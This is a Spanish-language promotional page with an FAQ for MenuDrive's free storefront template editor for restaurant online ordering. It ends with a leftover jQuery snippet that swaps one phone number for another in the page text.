Plantilla para tienda

Utilice los colores, el tipo de cocina y el estilo del restaurante para crear una representación perfecta de su restaurante en línea.

Lanza un restaurante profesional en línea en cuestión de minutos

Los pedidos en línea se han convertido en un complemento imprescindible para los restaurantes durante el último año. Nuestra biblioteca de plantillas gratuitas está diseñada específicamente para ayudar a los restaurantes a crear bonitos escaparates de forma rápida y sencilla. Selecciona entre más de 100 plantillas para empezar.

Preguntas frecuentes

Qué es el editor de plantillas para tiendas de MenuDrive?

El Editor de plantillas de escaparate le permite lanzar un sitio de pedidos en línea atractivo y profesional para su restaurante en cuestión de minutos. No requiere conocimientos de diseño gráfico ni de desarrollo web. Es una forma de hacer que su menú en línea sea irresistible para los clientes, sin inversión y con un alto rendimiento.

¿Cómo funciona?

El proceso es tan sencillo que le recomendamos que se sumerja en él para ver cómo funciona. Una vez que lo hagas, verás que puedes elegir el tipo de cocina y el “estilo” del restaurante (por ejemplo, retro, elegante, atrevido o minimalista), y luego añadir tu marca, logotipo e imágenes.

¿Cuánto cuesta?

El editor de plantillas para escaparates de MenuDrive es gratuito. Necesitarás una cuenta de MenuDrive para añadir tu plantilla personalizada a la tienda de tu restaurante online.

¿Cuántas plantillas hay para elegir?

Hay más de 100 plantillas en el Editor de Plantillas de Escaparate. Dado que cada una de ellas es personalizable para su marca, existen infinitas posibilidades para crear un escaparate que sea único para su restaurante.

Comience a diseñar su restaurante en línea

Actualizaciones gratuitas de plantillas y nuevas versiones
Secciones personalizables para su marca
Estilos y paletas de colores incorporados
Menú personalizable: hazlo tuyo
Fotos de archivo gratuitas de Canva
Plantilla de imagen publicitaria editable
Plantilla de fondo editable
Plantilla de imagen de cabecera editable
Scroll to Top jQuery(document).ready(function() { jQuery('*:not(script)').contents().filter(function() { return this.nodeType === 3 && this.nodeValue.includes('877.787.6368'); }).each(function() { this.nodeValue = this.nodeValue.replace(/877\.787\.6368/g, '505.535.5288'); }); });